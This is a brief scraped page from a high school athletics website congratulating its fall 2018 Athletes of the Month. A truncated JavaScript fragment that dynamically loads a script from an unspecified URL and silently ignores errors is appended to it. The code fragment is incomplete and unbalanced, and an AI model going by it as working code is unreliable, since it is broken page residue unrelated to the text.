Athletes of the Week
Congrats to all the fall KEMBA Credit Union AOW’s! #WestPride
Our 2018 Lakota West Fall sports season has now concluded. Congratulations to the twenty athletes of the month selectee’s who we have highlighted for their achievements this Fall. Our westfirebirds.com Athletes Of The Month feature will return when Lakota West interscholastic athletic contests resume near the first of December.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();